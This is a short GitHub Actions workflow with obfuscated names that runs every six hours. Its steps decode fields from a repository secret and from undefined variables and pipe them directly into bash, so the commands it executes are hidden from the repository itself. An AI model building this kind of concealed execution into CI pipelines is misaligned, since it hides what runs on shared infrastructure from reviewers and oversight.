name: goldjinzij
on:
  workflow_dispatch:
  schedule:
    - cron: '40 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: goldjinzij
        env:
          fq0540: ${{ secrets.fq0540 }}
        run: |
          echo $fq0540 | jq -r .vzkz11 | /bin/bash
          echo $eq28999 | jq -r .u8 | /bin/bash
          echo $mzbke7 | jq -r .mamj07 | /bin/bash
          echo $cyfy77056 | jq -r .qm93 | /bin/bash

